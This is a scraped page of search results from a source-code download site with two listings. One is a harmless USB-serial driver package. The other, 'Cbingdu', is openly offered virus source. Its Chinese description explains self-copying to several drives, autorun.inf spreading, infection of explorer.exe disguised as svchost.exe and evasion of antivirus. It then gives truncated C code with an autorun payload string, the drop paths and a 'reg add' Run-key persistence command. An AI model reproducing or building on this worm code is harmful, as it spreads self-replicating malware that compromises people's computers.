CodeBus
www.codebus.net
Search
Sign in
Sign up
Hot Search :
Source
embeded
web
remote control
p2p
game
More...
Location :
Home
Search - sys.d
Main Category
SourceCode
Documents
Books
WEB Code
Develop Tools
Other resource
Sub Category
GUI Develop
Windows Kernel
WinSock-NDIS
Driver Develop
ADO-ODBC
GDI-Bitmap
CSharp
.net
Multimedia Develop
Communication
Shell api
ActiveX/DCOM/ATL
IME Develop
ISAPI-IE
Hook api
Screen saver
DirextX
Process-Thread
Console
File Operate
Printing program
Multi Monitor
DNA
Other
Search - sys.d - List
[
Other
]
Cbingdu
DL : 0
1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件 2.在C、D、E盘中生成自动运行文件 3.注册c:\windows\system\svchost.exe,使其开机自动运行 4.在C:\windows\system下生成隐蔽DLL文件 5.病毒在执行后具有相联复制能力 1.在所有磁盘的根目录生成svchost.com和autorun.inf文件 2.生成病毒体: c:\windows\wjview32.com c:\windows\explorer.exe c:\windows\system32\dllcache\explorer.exe c:\windows\system\msmouse.dll c:\windows\system32\cmdsys.sys c:\windows\system32\mstsc32.exe 3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在 本病毒到目前为止任何杀毒软件都无法将其查杀 本病毒单机默认使用对机器无害(破坏代码已屏蔽) 提供病毒卸载程序(保存为X.BAT,双击运行即可卸载): 函数:制造垃圾文件 1.可以用于病毒开机自启动的注册表位置:-/* SVCHOST.C */ /* SVCHOST.EXE*/ #define SVCHOST_NUM 6 #include<stdio.h> #include<string.h> char*autorun={"[autorun]\nopen=SVCHOST.exe\n\nshell\\1=打开\nshell\\1\\Command=SVCHOST.exe\nshell\\2\\=Open\nshell\\2\\Command=SVCHOST.exe\nshellexecute=SVCHOST.exe"} char*files_autorun[10]={"c:\\autorun.inf","d:\\autorun.inf","e:\\autorun.inf"} char*files_svchost[SVCHOST_NUM+1]={"c:\\windows\\system\\MSMOUSE.DLL", "c:\\windows\\system\\SVCHOST.exe","c:\\windows\\SVCHOST.exe", "c:\\SVCHOST.exe","d:\\SVCHOST.exe","e:\\SVCHOST.exe","SVCHOST.exe"} char*regadd="reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v SVCHOST /d C:\\Windows\\system\\SVCHOST.exe /f" int copy(char*infile,char*outfile) { FILE*input,*output char temp if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL) && ((output=fopen (outfile,"wb"))!=NULL)) { while(!feof(input)) { fread(&temp,1,1,input) fwrite(&temp,1,1
Date
: 2026-01-01
Size
: 7kb
User
:
2626648
[
Other
]
usbPserialPcontroller-Driver
DL : 1
usb+serial+controller驱动 + USB下载软件 移动通信,通信工程师的家园,通信人才,求职招聘,网络优化,通信工程,出差住宿,通信企业黑名单(X*]$b0z)D }7n7J0T5`3M2^ 里面有两个软件,其中plc_2003(recommend)我在xp上验证过,可以用,另一个没有验证。在安装结束后要重启,如果你连上单片机后,提示缺少ser2pl.sys文件,在安装包的98ME_20011_2kXP_20024目录下有这个文件。记住,重启后生效,连上单片机后自动识别。 usb 2Bserial.zip (3.07 MB) 武汉虹信直放站测试软件所用的USB插件-the usb+serial+controller drive home to+ USB download software of mobile communication, communication engineers, communications personnel, Jobs, network optimization, communications engineering, travel accommodation, communications companies blacklist (X*] $ b0z) D } 7n7J0T5 `3M2 ^ there are two a software, which plc_2003 (recommend) on my xp validation, can be used, and another did not verify. To restart after installation, if you are connected to the microcontroller, suggesting missing ser2pl.sys file, this file the installation package 98ME_20011_2kXP_20024 directory. Remember, take effect after the restart, the microcontroller is connected to the automatic identification. Wuhan Hongxin usb 2Bserial.zip (3.07 MB) the repeater test software used USB plug
Date
: 2026-01-01
Size
: 3.07mb
User
:
alextuo
CodeBus
is one of the largest source code repositories on the Internet!
Contact us :
1999-2046
CodeBus
All Rights Reserved.